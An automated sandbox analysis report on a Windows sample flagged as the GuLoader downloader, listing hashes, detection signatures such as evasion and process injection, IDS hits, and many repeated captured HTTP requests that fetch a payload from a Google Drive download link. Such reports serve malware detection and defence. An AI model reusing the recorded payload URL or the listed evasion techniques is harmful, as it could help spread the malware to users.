Windows Analysis Report
fbXZ4ErQMU.exe

Overview

General Information

Sample name: fbXZ4ErQMU.exe
Analysis ID: 1569258
MD5: c58b26e27e2d9aa8080e289445e1c8ca
SHA1: 50dc9a8d9735a94a18cf3b35cb3c88217b3d05cd
SHA256: 9201c98d765025cad9fcbe9095c1f34960b641d38c6a4e999720a0c3c129353f
Infos:

Detection

GuLoader
Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Switches to a custom stack to bypass stack traces
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • fbXZ4ErQMU.exe (PID: 5468 cmdline: "C:\Users\user\Desktop\fbXZ4ErQMU.exe" MD5: C58B26E27E2D9AA8080E289445E1C8CA)
    • fbXZ4ErQMU.exe (PID: 5216 cmdline: "C:\Users\user\Desktop\fbXZ4ErQMU.exe" MD5: C58B26E27E2D9AA8080E289445E1C8CA)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.56492873526.000000000183F000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000000.00000002.53292835357.0000000002C0F000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
      No Sigma rule has matched
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-12-05T17:03:01.276027+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49751 | 142.250.217.238 | 443 | TCP

      AV Detection

      Source: fbXZ4ErQMU.exe, Avira: detected
      Source: fbXZ4ErQMU.exe, ReversingLabs: Detection: 60%
      Source: fbXZ4ErQMU.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknown, HTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49751 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49752 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49756 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49765 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49767 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49770 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49775 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49776 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49783 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49792 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49798 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49802 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49808 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49811 version: TLS 1.2
      Source: fbXZ4ErQMU.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: fbXZ4ErQMU.exe, 00000003.00000001.52635170494.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: mshtml.pdbUGP source: fbXZ4ErQMU.exe, 00000003.00000001.52635170494.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe, Code function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe, Code function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe, Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
      Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49751 -> 142.250.217.238:443
      Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Cache-Control: no-cache
      Source: global traffic, HTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
      Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Cache-Control: no-cache | Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global traffic, HTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive | Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
